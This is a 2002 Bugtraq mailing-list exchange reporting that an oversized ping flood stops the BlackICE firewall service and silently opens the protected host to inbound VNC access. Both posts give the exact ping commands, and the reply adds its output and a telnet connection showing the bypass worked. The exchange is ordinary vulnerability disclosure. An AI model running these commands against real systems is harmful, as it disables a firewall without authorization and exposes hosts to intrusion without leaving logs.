RE: Black ICE Ping Vulnerability Side Note

From: Keith T. Morgan (keith.morganat_private)
Date: Wed Feb 06 2002 - 12:16:36 PST


    Verified.  I set BID (without ICE CAP) to its paranoid setting, then did the following:
    
    root@stonegate:/var/log# ping -f -s 65000 -c 4000 192.168.x.x
    PING 192.168.x.x (192.168.x.x): 65000 data bytes
    ............................................................................................................................................
    --- 192.168.x.x ping statistics ---
    4310 packets transmitted, 4000 packets received, 7% packet loss
    round-trip min/avg/max = 15.1/22.7/337.7 ms
    root@stonegate:/var/log# telnet 192.168.x.x 5900
    Trying 192.168.x.x...
    Connected to 192.168.x.x.
    Escape character is '^]'.
    RFB 003.003
    
    
    The system tray icon for BID switched to the blue eyeball shield with the red diagonal slash.  Service stopped.  I was able to connect to the VNC port.
    
    
    -----Original Message-----
    From: Stoic forty-four [mailto:stoic44at_private]
    Sent: Wednesday, February 06, 2002 12:25 PM
    To: bugtraqat_private
    Subject: Black ICE Ping Vulnerability Side Note
    
    
    When attempting to replicate the ping vulnerability
    discovered by Matt Taylor a different outcome was
    discovered. Rather than the large ping causing the
    server to blue screen and/or hang the black ice
    service was actually stopped thus allowing an intruder
    to gain access to the host.
    
    Testing consisted of Black ICE Agent version 3.1eaj
    generated and deployed by ICE CAP version 3.1. The
    agent was installed on a Dell 6450 running Windows
    2000 SP2 and was running WinVNC 3.3 server in
    application mode. The Black ICE agent generated was
    set to use the Paranoid setting in order to prevent
    any inbound connections. Using VNC viewer from my
    desktop, I attempted to connect to the VNC server
    running on the Dell and was blocked. I then issued the
    command ping -l 65000 -t X.X.X.X, waited 5 seconds,
    and attempted to connect to the VNC server again and
    was successful. Upon connecting to the VNC server and
    gaining access to the desktop, a Black ICE pop up
    window appeared stating that the Black ICE service has
    stopped would you like to start it? I chose to start
    the service again which was successful but did not
    disconnect my VNC session and as mentioned before did
    not leave any logs in Black ICE showing anything had
    occurred.
    
    This information would more than likely affect
    Enterprises that have deployed Black ICE agents and
    have ICE CAP infrastructure deployed to manage them. I
    would like to know if anyone else is able to replicate
    this.
    
    Brandon Young
    
    



    This archive was generated by hypermail 2b30 : Wed Feb 06 2002 - 12:28:10 PST